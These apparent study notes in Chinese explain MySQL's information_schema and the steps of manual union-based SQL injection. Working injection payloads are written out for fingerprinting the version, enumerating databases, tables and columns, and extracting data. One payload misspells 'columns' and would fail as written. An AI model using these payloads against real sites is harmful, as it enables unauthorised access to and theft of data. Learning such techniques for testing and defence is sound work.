- Mysql相關知識點:
庫:就是一堆表組成的數據集合
數據庫裏自帶的系統庫:information_schema
Information_schema裏columns表裏存着所有字段名
information_schema裏schemata表裏存着所有庫名
information_schema裏tables表裏存着所有表名
常用的sql語句:
Select * from :從表裏查詢所有內容
Where :有條件的從表裏選取數據
and或or:按條件選取數據
order by :根據指定結果選取排序
Limit0,1:從第一行起顯示1條記錄
Union select :將多個表拼在一起
顯錯注入-聯合查詢(mysql)基本流程:
是否存在注入點—>猜解字段數—>聯合查詢尋找輸入點->利用系統自帶庫查詢字段名和表名->獲取我們需要的數據或權限
手工注入查詢相關內容
猜測數據庫版本:and 1=2 union select 1,version()
猜詢數據庫:and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1
查詢表名 :and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 1,1
查詢字段名:and 1=2 union select 1,group_concat(column_name) from information_schema.cloumns where table_schema=database() and table_name =‘表名’
查詢字段內容:and 1=2 union select 1,字段 from 表名